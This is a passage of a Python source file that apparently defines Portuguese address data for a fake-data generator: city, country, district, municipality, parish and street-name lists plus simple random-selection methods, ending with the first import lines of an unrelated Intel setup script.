"Covilhã",
"Câmara de Lobos",
"Elvas",
"Entroncamento",
"Ermesinde",
"Esmoriz",
"Espinho",
"Esposende",
"Estarreja",
"Estremoz",
"Fafe",
"Faro",
"Felgueiras",
"Figueira da Foz",
"Fiães",
"Freamunde",
"Funchal",
"Fundão",
"Fátima",
"Gafanha da Nazaré",
"Gandra",
"Gondomar",
"Gouveia",
"Guarda",
"Guimarães",
"Horta",
"Lagoa",
"Lagos",
"Lamego",
"Leiria",
"Lisboa",
"Lixa",
"Loulé",
"Loures",
"Lourosa",
"Macedo de Cavaleiros",
"Maia",
"Mangualde",
"Marco de Canaveses",
"Marinha Grande",
"Matosinhos",
"Mealhada",
"Miranda do Douro",
"Mirandela",
"Montemor-o-Novo",
"Montijo",
"Moura",
"Mêda",
"Odivelas",
"Olhão",
"Oliveira de Azeméis",
"Oliveira do Bairro",
"Oliveira do Hospital",
"Ourém",
"Ovar",
"Paredes",
"Paços de Ferreira",
"Penafiel",
"Peniche",
"Peso da Régua",
"Pinhel",
"Pombal",
"Ponta Delgada",
"Ponte de Sor",
"Portalegre",
"Portimão",
"Porto",
"Porto Santo",
"Praia da Vitória",
"Póvoa de Santa Iria",
"Póvoa de Varzim",
"Quarteira",
"Queluz",
"Rebordosa",
"Reguengos de Monsaraz",
"Ribeira Grande",
"Rio Maior",
"Rio Tinto",
"Sabugal",
"Sacavém",
"Santa Comba Dão",
"Santa Cruz",
"Santa Maria da Feira",
"Santana",
"Santarém",
"Santiago do Cacém",
"Santo Tirso",
"Seia",
"Seixal",
"Serpa",
"Setúbal",
"Silves",
"Sines",
"Sintra",
"São João da Madeira",
"São Mamede de Infesta",
"São Salvador de Lordelo",
"Tarouca",
"Tavira",
"Tomar",
"Tondela",
"Torres Novas",
"Torres Vedras",
"Trancoso",
"Trofa",
"Valbom",
"Vale de Cambra",
"Valongo",
"Valpaços",
"Vendas Novas",
"Viana do Castelo",
"Vila Franca de Xira",
"Vila Nova de Famalicão",
"Vila Nova de Foz Côa",
"Vila Nova de Gaia",
"Vila Nova de Santo André",
"Vila Real",
"Vila Real de Santo António",
"Vila do Conde",
"Viseu",
"Vizela",
"Évora",
"Ílhavo",
)
countries = (
"Afeganistão",
"África do Sul",
"Akrotiri",
"Albânia",
"Alemanha",
"Andorra",
"Angola",
"Anguila",
"Antárctida",
"Antígua e Barbuda",
"Antilhas Neerlandesas",
"Arábia Saudita",
"Arctic Ocean",
"Argélia",
"Argentina",
"Arménia",
"Aruba",
"Ashmore and Cartier Islands",
"Atlantic Ocean",
"Austrália",
"Áustria",
"Azerbaijão",
"Baamas",
"Bangladeche",
"Barbados",
"Barém",
"Bélgica",
"Belize",
"Benim",
"Bermudas",
"Bielorrússia",
"Birmânia",
"Bolívia",
"Bósnia e Herzegovina",
"Botsuana",
"Brasil",
"Brunei",
"Bulgária",
"Burquina Faso",
"Burúndi",
"Butão",
"Cabo Verde",
"Camarões",
"Camboja",
"Canadá",
"Catar",
"Cazaquistão",
"Chade",
"Chile",
"China",
"Chipre",
"Clipperton Island",
"Colômbia",
"Comores",
"Congo-Brazzaville",
"Congo-Kinshasa",
"Coral Sea Islands",
"Coreia do Norte",
"Coreia do Sul",
"Costa do Marfim",
"Costa Rica",
"Croácia",
"Cuba",
"Dhekelia",
"Dinamarca",
"Domínica",
"Egipto",
"Emiratos Árabes Unidos",
"Equador",
"Eritreia",
"Eslováquia",
"Eslovénia",
"Espanha",
"Estados Unidos",
"Estónia",
"Etiópia",
"Faroé",
"Fiji",
"Filipinas",
"Finlândia",
"França",
"Gabão",
"Gâmbia",
"Gana",
"Gaza Strip",
"Geórgia",
"Geórgia do Sul e Sandwich do Sul",
"Gibraltar",
"Granada",
"Grécia",
"Gronelândia",
"Guame",
"Guatemala",
"Guernsey",
"Guiana",
"Guiné",
"Guiné Equatorial",
"Guiné-Bissau",
"Haiti",
"Honduras",
"Hong Kong",
"Hungria",
"Iémen",
"Ilha Bouvet",
"Ilha do Natal",
"Ilha Norfolk",
"Ilhas Caimão",
"Ilhas Cook",
"Ilhas dos Cocos",
"Ilhas Falkland",
"Ilhas Heard e McDonald",
"Ilhas Marshall",
"Ilhas Salomão",
"Ilhas Turcas e Caicos",
"Ilhas Virgens Americanas",
"Ilhas Virgens Britânicas",
"Índia",
"Indian Ocean",
"Indonésia",
"Irão",
"Iraque",
"Irlanda",
"Islândia",
"Israel",
"Itália",
"Jamaica",
"Jan Mayen",
"Japão",
"Jersey",
"Jibuti",
"Jordânia",
"Kuwait",
"Laos",
"Lesoto",
"Letónia",
"Líbano",
"Libéria",
"Líbia",
"Listenstaine",
"Lituânia",
"Luxemburgo",
"Macau",
"Macedónia",
"Madagáscar",
"Malásia",
"Malávi",
"Maldivas",
"Mali",
"Malta",
"Man, Isle of",
"Marianas do Norte",
"Marrocos",
"Maurícia",
"Mauritânia",
"Mayotte",
"México",
"Micronésia",
"Moçambique",
"Moldávia",
"Mónaco",
"Mongólia",
"Monserrate",
"Montenegro",
"Mundo",
"Namíbia",
"Nauru",
"Navassa Island",
"Nepal",
"Nicarágua",
"Níger",
"Nigéria",
"Niue",
"Noruega",
"Nova Caledónia",
"Nova Zelândia",
"Omã",
"Pacific Ocean",
"Países Baixos",
"Palau",
"Panamá",
"Papua-Nova Guiné",
"Paquistão",
"Paracel Islands",
"Paraguai",
"Peru",
"Pitcairn",
"Polinésia Francesa",
"Polónia",
"Porto Rico",
"Portugal",
"Quénia",
"Quirguizistão",
"Quiribáti",
"Reino Unido",
"República Centro-Africana",
"República Checa",
"República Dominicana",
"Roménia",
"Ruanda",
"Rússia",
"Salvador",
"Samoa",
"Samoa Americana",
"Santa Helena",
"Santa Lúcia",
"São Cristóvão e Neves",
"São Marinho",
"São Pedro e Miquelon",
"São Tomé e Príncipe",
"São Vicente e Granadinas",
"Sara Ocidental",
"Seicheles",
"Senegal",
"Serra Leoa",
"Sérvia",
"Singapura",
"Síria",
"Somália",
"Southern Ocean",
"Spratly Islands",
"Sri Lanca",
"Suazilândia",
"Sudão",
"Suécia",
"Suíça",
"Suriname",
"Svalbard e Jan Mayen",
"Tailândia",
"Taiwan",
"Tajiquistão",
"Tanzânia",
"Território Britânico do Oceano Índico",
"Territórios Austrais Franceses",
"Timor Leste",
"Togo",
"Tokelau",
"Tonga",
"Trindade e Tobago",
"Tunísia",
"Turquemenistão",
"Turquia",
"Tuvalu",
"Ucrânia",
"Uganda",
"União Europeia",
"Uruguai",
"Usbequistão",
"Vanuatu",
"Vaticano",
"Venezuela",
"Vietname",
"Wake Island",
"Wallis e Futuna",
"West Bank",
"Zâmbia",
"Zimbabué",
)
# From https://pt.wikipedia.org/wiki/Distritos_de_Portugal
distritos = (
"Aveiro",
"Beja",
"Braga",
"Bragança",
"Castelo Branco",
"Coimbra",
"Évora",
"Faro",
"Guarda",
"Leiria",
"Lisboa",
"Portalegre",
"Porto",
"Santarém",
"Setúbal",
"Viana do Castelo",
"Vila Real",
"Viseu",
)
# From https://pt.wikipedia.org/wiki/Lista_de_concelhos_por_NUTS,_distritos_e_ilhas
concelhos = (
"Águeda",
"Aguiar da Beira",
"Alandroal",
"Albergaria-a-Velha",
"Albufeira",
"Alcácer do Sal",
"Alcanena",
"Alcobaça",
"Alcochete",
"Alcoutim",
"Alenquer",
"Alfândega da Fé",
"Alijó",
"Aljezur",
"Aljustrel",
"Almada",
"Almeida",
"Almeirim",
"Almodôvar",
"Alpiarça",
"Alter do Chão",
"Alvaiázere",
"Alvito",
"Amadora",
"Amarante",
"Amares",
"Anadia",
"Angra do Heroísmo",
"Ansião",
"Arcos de Valdevez",
"Arganil",
"Armamar",
"Arouca",
"Arraiolos",
"Arronches",
"Arruda dos Vinhos",
"Aveiro",
"Avis",
"Azambuja",
"Baião",
"Barcelos",
"Barrancos",
"Barreiro",
"Batalha",
"Beja",
"Belmonte",
"Benavente",
"Bombarral",
"Borba",
"Boticas",
"Braga",
"Bragança",
"Cabeceiras de Basto",
"Cadaval",
"Caldas da Rainha",
"Calheta (R.A.A.)",
"Calheta (R.A.M.)",
"Câmara de Lobos",
"Caminha",
"Campo Maior",
"Cantanhede",
"Carrazeda de Ansiães",
"Carregal do Sal",
"Cartaxo",
"Cascais",
"Castanheira de Pêra",
"Castelo Branco",
"Castelo de Paiva",
"Castelo de Vide",
"Castro Daire",
"Castro Marim",
"Castro Verde",
"Celorico da Beira",
"Celorico de Basto",
"Chamusca",
"Chaves",
"Cinfães",
"Coimbra",
"Condeixa-a-Nova",
"Constância",
"Coruche",
"Corvo",
"Covilhã",
"Crato",
"Cuba",
"Elvas",
"Entroncamento",
"Espinho",
"Esposende",
"Estarreja",
"Estremoz",
"Évora",
"Fafe",
"Faro",
"Felgueiras",
"Ferreira do Alentejo",
"Ferreira do Zêzere",
"Figueira da Foz",
"Figueira de Castelo Rodrigo",
"Figueiró dos Vinhos",
"Fornos de Algodres",
"Freixo de Espada à Cinta",
"Fronteira",
"Funchal",
"Fundão",
"Gavião",
"Góis",
"Golegã",
"Gondomar",
"Gouveia",
"Grândola",
"Guarda",
"Guimarães",
"Horta",
"Idanha-a-Nova",
"Ílhavo",
"Lagoa",
"Lagoa (R.A.A)",
"Lagos",
"Lajes das Flores",
"Lajes do Pico",
"Lamego",
"Leiria",
"Lisboa",
"Loulé",
"Loures",
"Lourinhã",
"Lousã",
"Lousada",
"Mação",
"Macedo de Cavaleiros",
"Machico",
"Madalena",
"Mafra",
"Maia",
"Mangualde",
"Manteigas",
"Marco de Canaveses",
"Marinha Grande",
"Marvão",
"Matosinhos",
"Mealhada",
"Meda",
"Melgaço",
"Mértola",
"Mesão Frio",
"Mira",
"Miranda do Corvo",
"Miranda do Douro",
"Mirandela",
"Mogadouro",
"Moimenta da Beira",
"Moita",
"Monção",
"Monchique",
"Mondim de Basto",
"Monforte",
"Montalegre",
"Montemor-o-Novo",
"Montemor-o-Velho",
"Montijo",
"Mora",
"Mortágua",
"Moura",
"Mourão",
"Murça",
"Murtosa",
"Nazaré",
"Nelas",
"Nisa",
"Nordeste",
"Óbidos",
"Odemira",
"Odivelas",
"Oeiras",
"Oleiros",
"Olhão",
"Oliveira de Azeméis",
"Oliveira de Frades",
"Oliveira do Bairro",
"Oliveira do Hospital",
"Ourém",
"Ourique",
"Ovar",
"Paços de Ferreira",
"Palmela",
"Pampilhosa da Serra",
"Paredes",
"Paredes de Coura",
"Pedrógão Grande",
"Penacova",
"Penafiel",
"Penalva do Castelo",
"Penamacor",
"Penedono",
"Penela",
"Peniche",
"Peso da Régua",
"Pinhel",
"Pombal",
"Ponta Delgada",
"Ponta do Sol",
"Ponte da Barca",
"Ponte de Lima",
"Ponte de Sor",
"Portalegre",
"Portel",
"Portimão",
"Porto",
"Porto de Mós",
"Porto Moniz",
"Porto Santo",
"Povoação",
"Póvoa de Lanhoso",
"Póvoa de Varzim",
"Proença-a-Nova",
"Redondo",
"Reguengos de Monsaraz",
"Resende",
"Ribeira Brava",
"Ribeira de Pena",
"Ribeira Grande",
"Rio Maior",
"Sabrosa",
"Sabugal",
"Salvaterra de Magos",
"Santa Comba Dão",
"Santa Cruz",
"Santa Cruz da Graciosa",
"Santa Cruz das Flores",
"Santa Maria da Feira",
"Santa Marta de Penaguião",
"Santana",
"Santarém",
"Santiago do Cacém",
"Santo Tirso",
"São Brás de Alportel",
"São João da Madeira",
"São João da Pesqueira",
"São Pedro do Sul",
"São Roque do Pico",
"São Vicente",
"Sardoal",
"Sátão",
"Seia",
"Seixal",
"Sernancelhe",
"Serpa",
"Sertã",
"Sesimbra",
"Setúbal",
"Sever do Vouga",
"Silves",
"Sines",
"Sintra",
"Sobral de Monte Agraço",
"Soure",
"Sousel",
"Tábua",
"Tabuaço",
"Tarouca",
"Tavira",
"Terras de Bouro",
"Tomar",
"Tondela",
"Torre de Moncorvo",
"Torres Novas",
"Torres Vedras",
"Trancoso",
"Trofa",
"Vagos",
"Vale de Cambra",
"Valença",
"Valongo",
"Valpaços",
"Velas",
"Vendas Novas",
"Viana do Alentejo",
"Viana do Castelo",
"Vidigueira",
"Vieira do Minho",
"Vila da Praia da Vitória",
"Vila de Rei",
"Vila do Bispo",
"Vila do Conde",
"Vila do Porto",
"Vila Flor",
"Vila Franca de Xira",
"Vila Franca do Campo",
"Vila Nova da Barquinha",
"Vila Nova de Cerveira",
"Vila Nova de Famalicão",
"Vila Nova de Foz Côa",
"Vila Nova de Gaia",
"Vila Nova de Paiva",
"Vila Nova de Poiares",
"Vila Pouca de Aguiar",
"Vila Real",
"Vila Real de Santo António",
"Vila Velha de Ródão",
"Vila Verde",
"Vila Viçosa",
"Vimioso",
"Vinhais",
"Viseu",
"Vizela",
"Vouzela",
)
# From https://pt.wikipedia.org/wiki/Lista_de_freguesias_de_Portugal
freguesias = [
"Abrantes",
"Águeda",
"Aguiar da Beira",
"Alandroal",
"Albergaria-a-Velha",
"Albufeira",
"Alcácer do Sal",
"Alcanena",
"Alcobaça",
"Alcochete",
"Alcoutim",
"Alenquer",
"Alfândega da Fé",
"Alijó",
"Aljezur",
"Aljustrel",
"Almada",
"Almeida",
"Almeirim",
"Almodôvar",
"Alpiarça",
"Alter do Chão",
"Alvaiázere",
"Alvito",
"Amadora",
"Amarante",
"Amares",
"Anadia",
"Angra do Heroísmo",
"Ansião",
"Arcos de Valdevez",
"Arganil",
"Armamar",
"Arouca",
"Arraiolos",
"Arronches",
"Arruda dos Vinhos",
"Aveiro",
"Avis",
"Azambuja",
"Baião",
"Barcelos",
"Barrancos",
"Barreiro",
"Batalha",
"Beja",
"Belmonte",
"Benavente",
"Bombarral",
"Borba",
"Boticas",
"Braga",
"Bragança",
"Cabeceiras de Basto",
"Cadaval",
"Caldas da Rainha",
"Calheta (Açores)",
"Calheta (Madeira)",
"Câmara de Lobos",
"Caminha",
"Campo Maior",
"Cantanhede",
"Carrazeda de Ansiães",
"Carregal do Sal",
"Cartaxo",
"Cascais",
"Castanheira de Pêra",
"Castelo Branco",
"Castelo de Paiva",
"Castelo de Vide",
"Castro Daire",
"Castro Marim",
"Castro Verde",
"Celorico da Beira",
"Celorico de Basto",
"Chamusca",
"Chaves",
"Cinfães",
"Coimbra",
"Condeixa-a-Nova",
"Constância",
"Coruche",
"Corvo",
"Covilhã",
"Crato",
"Cuba",
"Elvas",
"Entroncamento",
"Espinho",
"Esposende",
"Estarreja",
"Estremoz",
"Évora",
"Fafe",
"Faro",
"Felgueiras",
"Ferreira do Alentejo",
"Ferreira do Zêzere",
"Figueira da Foz",
"Figueira de Castelo Rodrigo",
"Figueiró dos Vinhos",
"Fornos de Algodres",
"Freixo de Espada à Cinta",
"Fronteira",
"Funchal",
"Fundão",
"Gavião",
"Góis",
"Golegã",
"Gondomar",
"Gouveia",
"Grândola",
"Guarda",
"Guimarães",
"Horta",
"Idanha-a-Nova",
"Ílhavo",
"Lagoa",
"Lagoa (Açores)",
"Lagos",
"Lajes das Flores",
"Lajes do Pico",
"Lamego",
"Leiria",
"Lisboa",
"Loulé",
"Loures",
"Lourinhã",
"Lousã",
"Lousada",
"Mação",
"Macedo de Cavaleiros",
"Machico",
"Madalena",
"Mafra",
"Maia",
"Mangualde",
"Manteigas",
"Marco de Canaveses",
"Marinha Grande",
"Marvão",
"Matosinhos",
"Mealhada",
"Mêda",
"Melgaço",
"Mértola",
"Mesão Frio",
"Mira",
"Miranda do Corvo",
"Miranda do Douro",
"Mirandela",
"Mogadouro",
"Moimenta da Beira",
"Moita",
"Monção",
"Monchique",
"Mondim de Basto",
"Monforte",
"Montalegre",
"Montemor-o-Novo",
"Montemor-o-Velho",
"Montijo",
"Mora",
"Mortágua",
"Moura",
"Mourão",
"Murça",
"Murtosa",
"Nazaré",
"Nelas",
"Nisa",
"Nordeste",
"Óbidos",
"Odemira",
"Odivelas",
"Oeiras",
"Oleiros",
"Olhão",
"Oliveira de Azeméis",
"Oliveira de Frades",
"Oliveira do Bairro",
"Oliveira do Hospital",
"Ourém",
"Ourique",
"Ovar",
"Paços de Ferreira",
"Palmela",
"Pampilhosa da Serra",
"Paredes",
"Paredes de Coura",
"Pedrógão Grande",
"Penacova",
"Penafiel",
"Penalva do Castelo",
"Penamacor",
"Penedono",
"Penela",
"Peniche",
"Peso da Régua",
"Pinhel",
"Pombal",
"Ponta Delgada",
"Ponta do Sol",
"Ponte da Barca",
"Ponte de Lima",
"Ponte de Sor",
"Portalegre",
"Portel",
"Portimão",
"Porto",
"Porto de Mós",
"Porto Moniz",
"Porto Santo",
"Póvoa de Lanhoso",
"Póvoa de Varzim",
"Povoação",
"Praia da Vitória",
"Proença-a-Nova",
"Redondo",
"Reguengos de Monsaraz",
"Resende",
"Ribeira Brava",
"Ribeira de Pena",
"Ribeira Grande",
"Rio Maior",
"Sabrosa",
"Sabugal",
"Salvaterra de Magos",
"Santa Comba Dão",
"Santa Cruz",
"Santa Cruz da Graciosa",
"Santa Cruz das Flores",
"Santa Maria da Feira",
"Santa Marta de Penaguião",
"Santana",
"Santarém",
"Santiago do Cacém",
"Santo Tirso",
"São Brás de Alportel",
"São João da Madeira",
"São João da Pesqueira",
"São Pedro do Sul",
"São Roque do Pico",
"São Vicente (Madeira)",
"Sardoal",
"Sátão",
"Seia",
"Seixal",
"Sernancelhe",
"Serpa",
"Sertã",
"Sesimbra",
"Setúbal",
"Sever do Vouga",
"Silves",
"Sines",
"Sintra",
"Sobral de Monte Agraço",
"Soure",
"Sousel",
"Tábua",
"Tabuaço",
"Tarouca",
"Tavira",
"Terras de Bouro",
"Tomar",
"Tondela",
"Torre de Moncorvo",
"Torres Novas",
"Torres Vedras",
"Trancoso",
"Trofa",
"Vagos",
"Vale de Cambra",
"Valença",
"Valongo",
"Valpaços",
"Velas",
"Vendas Novas",
"Viana do Alentejo",
"Viana do Castelo",
"Vidigueira",
"Vieira do Minho",
"Vila de Rei",
"Vila do Bispo",
"Vila do Conde",
"Vila do Porto",
"Vila Flor",
"Vila Franca de Xira",
"Vila Franca do Campo",
"Vila Nova da Barquinha",
"Vila Nova de Cerveira",
"Vila Nova de Famalicão",
"Vila Nova de Foz Côa",
"Vila Nova de Gaia",
"Vila Nova de Paiva",
"Vila Nova de Poiares",
"Vila Pouca de Aguiar",
"Vila Real",
"Vila Real de Santo António",
"Vila Velha de Ródão",
"Vila Verde",
"Vila Viçosa",
"Vimioso",
"Vinhais",
"Viseu",
"Vizela",
"Vouzela",
]
# from https://pt.wikipedia.org/wiki/Lista_de_arruamentos_de_Lisboa
# and https://pt.wikipedia.org/wiki/Lista_de_arruamentos_do_Porto
places = (
"da Igreja",
"António Sérgio",
"Cardeal Cerejeira",
"Coronel Marques Júnior",
"da Encarnação",
"da Música",
"da Quinta de Santo António",
"da Universidade",
"das Comunidades Portuguesas",
"das Linhas de Torres",
"de Santo António dos Capuchos",
"do Beato",
"Dom Afonso Henriques",
"dos Oceanos",
"dos Pinheiros",
"Edgar Cardoso",
"Mahatma Gandhi",
"Manuel Ricardo Espírito Santo",
"Padre Álvaro Proença",
"Roentgen",
"da Boavista",
"da Cova da Moura",
"das Conchas",
"de Caselas",
"de São Francisco",
"do Carvalhão",
"do Longo",
"do Penalva",
"do Varejão",
"dos Moinhos",
"da Conceição",
"das Portas do Mar",
"de Jesus",
"do Evaristo",
"do Rosário",
"Escuro",
"Grande de Cima",
"Areeiro",
"Campolide",
"Madrid",
"Paris (Nascente)",
"Paris (Poente)",
"Roma",
"Sabugosa",
"Novo (à Travessa das Águas Boas)",
"da Ponte da Lama",
"da Praia da Galé",
"do Duro",
"dos Ferreiros",
"das Rolas",
"da Lingueta",
"das Naus",
"do Olival",
"do Sodré",
"dos Argonautas",
"Português",
"da Figueira",
"de Santo Estêvão",
"de São Lourenço",
"de São Miguel",
"do Tijolo",
"dos Olivais",
"da Feiteira",
"da Rainha",
"da Raposa",
"das Andorinhas",
"das Cegonhas",
"das Gaivotas ao Parque das Nações",
"de Baixo da Penha",
"de Palma de Cima",
"do Alto do Varejão",
"do Arboreto",
"dos Estorninhos",
"dos Flamingos",
"dos Melros",
"dos Pardais",
"dos Pinheiros ao Parque das Nações",
"dos Rouxinóis",
"Velho do Outeiro",
"das Amoreiras",
"das Cebolas",
"de Santa Clara",
"dos Mártires da Pátria",
"Grande",
"Pequeno",
"de Campolide",
"da Graça",
"de Colares",
"Norte do Bairro da Encarnação",
"Sul do Bairro da Encarnação",
"da Torrinha",
"do Castelo",
"de Santa Helena",
"da Sé",
"das Bolas",
"das Chagas",
"José António Marques",
"do Monte",
"Gerais",
"D. Carlos I ao Parque das Nações",
"Adão Barata",
"Alfredo Keil",
"Alice Cruz",
"Amália Rodrigues",
"Amélia Carvalheira",
"Amnistia Internacional",
"Augusto Monjardino",
"Bento Martins",
"das Nações",
"Ducla Soares",
"Eduardo Prado Coelho",
"Elisa Baptista de Sousa Pedroso",
"Fernanda de Castro",
"Fernando Pessa",
"Ferreira de Mira",
"Garcia de Orta ao Parque das Nações",
"Irmã Lúcia",
"Jorge Luis Borges",
"Luís Ferreira",
"Maria da Luz Ponces de Carvalho",
"Maria de Lourdes Sá Teixeira",
"Maria José Moura",
"Mário Ruivo",
"Mário Soares",
"9 de Abril",
"Prof. António de Sousa Franco",
"Prof. Francisco Caldeira Cabral",
"Pulido Garcia",
"Tristão da Silva",
"Ribeirinhos",
"Sophia de Mello Breyner Andresen",
"do Mirante",
"do Alto de São João",
"General Afonso Botelho",
"Eduardo VII de Inglaterra",
"Silva Porto",
"Artur Agostinho",
"da Ilha dos Amores",
"da Nau Catrineta",
"da Vila Expo",
"das Âncoras",
"das Fragatas",
"das Garças",
"das Gáveas ao Parque das Nações",
"das Musas",
"das Tágides",
"de Neptuno",
"de Ulisses",
"do Adamastor",
"do Amazonas",
"do Báltico",
"do Campo da Bola",
"do Cantábrico",
"do Levante",
"do Parque",
"do Ródano",
"do Sapal",
"do Tejo",
"do Trancão",
"dos Aventureiros",
"dos Cruzados",
"dos Fenícios",
"dos Heróis do Mar",
"dos Jacarandás",
"dos Mastros",
"dos Navegadores",
"João Jayme Faria Affonso",
"Júlio Verne",
"Afonso de Albuquerque",
"da Cruz",
"da Galega",
"das Canas",
"das Galeotas ao Parque das Nações",
"das Pirogas",
"de Dom Fradique",
"do Carrasco",
"do Peneireiro",
"do Pimenta",
"do Pinzaleiro",
"do Seabra",
"do Sequeiro",
"do Sextante",
"do Tronco",
"dos Escaleres",
"do Borratém",
"do Mar",
"Adolfo Ayala",
"Cuf",
"da Quinta de São João Baptista",
"da Quinta do Guarda-Mor",
"da Rua Duque de Palmela",
"das Torres do Restelo",
"do Chinquilho",
"Fernando Valle",
"Maestro Ivo Cruz",
"Prof. António José Saraiva",
"Professor Gonçalves Ferreira",
"Professor José Conde",
"Teófilo Ferreira",
"das Necessidades",
"do Mercado",
"dos Anjos",
"do Conde de Óbidos",
"de Palma",
"Almirante Pinheiro de Azevedo",
"António Dias Lourenço",
"Coronel Vítor Alves",
"da Expo 98",
"das Olaias",
"das Oliveiras",
"de Pina Manique",
"dos Vice-reis",
"Matilde Bensaúde",
"Nelson Mandela",
"Pupilos do Exército",
"República Argentina",
"República da Colômbia",
"Visconde de Alvalade",
"do Barcal",
"do Calhau",
"de São Vicente",
"das Ondas",
"dos Corvos",
"Feia",
"Arquitecto Carlos Ramos",
"das Antas",
"das Fontainhas",
"de 25 de Abril",
"de Aquilino Ribeiro",
"de Basílio Teles",
"de Cartes",
"de Cláudio Carneiro",
"de Eça de Queirós",
"de Manuel d'Arriaga",
"do Dr. António Macedo",
"do Dr. Fernando de Azeredo Antas",
"do Prof. Hernâni Monteiro",
"do Prof. Ruy Luís Gomes",
"dos Capitães de Abril",
"25 de Abril",
"da Associação Empresarial de Portugal",
"da França",
"de Camilo",
"de D. Afonso Henriques",
"de D. Carlos I",
"de D. João II",
"de Fernão de Magalhães",
"de Fontes Pereira de Melo",
"de Gustavo Eiffel",
"de Montevideu",
"de Nun'Álvares Pereira",
"de Paiva Couceiro",
"de Rodrigues de Freitas",
"de Sidónio Pais",
"de Vasco da Gama",
"de Vímara Peres",
"do Bessa",
"do Brasil (Porto)",
"do Conselho da Europa",
"do Dr. Antunes Guimarães",
"do Marechal Gomes da Costa",
"dos Aliados",
"dos Combatentes da Grande Guerra",
"Flor da Rosa",
"José Domingues dos Santos",
"da Agra do Amial",
"da Fonte da Moura",
"da Pasteleira",
"da Rainha D. Leonor",
"de Costa Cabral",
"de Francos",
"de Manuel Cardoso Agrelos",
"de Pio XII",
"de Ramalde",
"de São João de Deus",
"de São Roque da Lameira",
"de São Vicente de Paulo",
"de Santo Eugénio",
"do Aleixo",
"do Bom Sucesso",
"do Carvalhido",
"do Cerco do Porto",
"do Dr. Nuno Pinheiro Torres",
"do Falcão",
"do Lagarteiro",
"do Leal",
"do Outeiro",
"do Regado",
"do Viso",
"Herculano",
"Central",
"da Bela Vista",
"da Beneditina",
"da Senhora da Luz",
"de Bonjóia",
"de Carreiras",
"de Passos Manuel",
"de S. João da Foz",
"de S. Macário",
"de S. Marçal",
"do Arrabalde",
"do Campo",
"do Campo Alegre",
"do Machado",
"do Meiral",
"do Paço",
"do Pedregulho",
"do Preto",
"de Baixo",
"de Cima",
"da Alfândega",
"da Estiva",
"da Ribeira",
"das Pedras",
"do Bicalho",
"dos Guindais",
"da Arrábida",
"da Boa Viagem",
"da Póvoa",
"da Ranha",
"das Carquejeiras",
"das Laranjeiras",
"das Virtudes",
"de Chaves de Oliveira",
"de D. Pedro Pitões",
"de Godim",
"de João do Carmo",
"de Maceda",
"de Marques Marinho",
"de Monchique",
"de Nova Sintra",
"de São Pedro",
"de Serrúbia",
"de Sobre-o-Douro",
"de Vandoma",
"do Calvário",
"do Carregal",
"do Forno Velho",
"do Monte da Lapa",
"do Monte de S. João",
"do Ouro",
"do Rego Lameiro",
"dos Ingleses",
"da Fonte de Cima",
"das Congostas",
"da Asprela",
"de Vinte e Quatro de Agosto",
"do Rou",
"de Antero de Quental",
"de Estêvão Vasconcelos",
"de Viterbo de Campos",
"do Dr. Manuel Laranjeira",
"Carolina Michaelis de Vasconcelos",
"da Vitória",
"das Sereias",
"das Verdades",
"de S. Francisco de Borja",
"do Adro",
"do Barredo",
"do Caminho Novo",
"do Cidral de Baixo",
"do Cidral de Cima",
"do Codeçal",
"do Colégio",
"do Monte Cativo",
"do Monte dos Judeus",
"do Pinheiro",
"do Recanto",
"do Roleto",
"dos Armazéns",
"do Molhe",
"da Circunvalação",
"de Gondomar",
"Nacional 108",
"Nacional 209",
"de Moradias Populares do Eng.º Machado Vaz",
"de Moradais Populares do Carriçal",
"de Antero de Figueiredo",
"de Arnaldo Gama",
"de Belém",
"de Carrilho Videira",
"de Guedes de Oliveira",
"de João Chagas",
"de Marques de Oliveira",
"de Teófilo Braga",
"do Moreda",
"do Passeio Alegre",
"Machado de Asis",
"Severo Portela",
"da Foz",
"do Bolhão",
"dos Bacalhoeiros",
"da Luz",
"do Seminário",
"S. Bartolomeu",
"de S. Lázaro",
"das Escadas do Monte dos Judeus",
"das Japoneiras",
"de S. Salvador",
"do Bonjardim",
"de Luiz I",
"de Maria Pia",
"do Freixo",
"do Carvão",
"da Banda de Ramalde",
"da Cidade da Praia",
"das Mimosas",
"de Adelino Amaro da Costa",
"de Augusto Gomes",
"de Bernarda Ferreira Lacerda",
"de Eduardo Soares",
"de Francisco Borges",
"de Irene de Castro",
"de João Augusto Ribeiro",
"de José Régio",
"de José Serra",
"de Luís António Verney",
"de Públia Hortênsia",
"de Ribeiro Sanches",
"de S. Mamede",
"do Dr. Jaime Cortesão",
"do Maestro Afonso Valentim",
"do Maestro Resende Dias",
"do Mestre de Aviz",
"do Prof. Egas Moniz",
"Egito Gonçalves",
"Ernesto Veiga de Oliveira",
"João Glama",
"José Luís Nunes",
"Manuel Gonçalves Moreira",
"Artur Cupertino de Miranda",
"Associação Empresarial de Portugal",
"Manuel Pinto de Azevedo Júnior",
"Goelas de Pau",
"de Cintura Interna",
"do Almirante Gago Coutinho",
"do Castelo do Queijo",
"Futebol Clube do Porto",
"Panorâmica",
"Panorâmica Edgar Cardoso",
"de Gonçalo Cristóvão",
"do Cais das Pedras",
"da Aldeia",
"da Baleia",
"da Bouça",
"da Carvalhosa",
"da Companhia",
"da Ilha do Ferro",
"da Pedreira",
"da Senhora da Lapa",
"das Andrezas",
"de Grijó",
"de Lamas",
"de S. Brás",
"de Santana",
"do Anjo",
"do Anjo da Guarda",
"do Buraco",
"do José da Mestra",
"do Monte da Pena",
"do Picoto",
"do Sobreirinho",
)
def street_prefix(self) -> str:
"""
:example: 'Rua'
"""
return self.random_element(self.street_prefixes)
def city_name(self) -> str:
"""
:example: 'Amora'
"""
return self.random_element(self.cities)
def administrative_unit(self) -> str:
"""
:example: 'Bragança'
"""
return self.random_element(self.distritos)
distrito = administrative_unit
def concelho(self) -> str:
"""
:example: 'Tondela'
"""
return self.random_element(self.concelhos)
def freguesia(self) -> str:
"""
:example: 'Miranda do Douro'
"""
return self.random_element(self.freguesias)
def place_name(self) -> str:
"""
:example: "do Pombal"
"""
return self.random_element(self.places)
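# Usage sketch (an assumption, not part of the provider itself): these methods are
# normally reached through a Faker instance configured for the pt_PT locale:
#
#   from faker import Faker
#   fake = Faker("pt_PT")
#   fake.street_prefix()   # e.g. 'Rua'
#   fake.city_name()       # e.g. 'Amora'
#   fake.freguesia()       # e.g. 'Miranda do Douro'
#   fake.address()         # combines the street_address and postcode formats above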
|
py | b415d13cb437939d6150a216e1678c080bf83c02 | # -*- coding: utf-8 -*-
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os.path
import sys
import errno
import subprocess # nosec
import typing
import platform
import multiprocessing
from fnmatch import fnmatchcase
from pathlib import Path
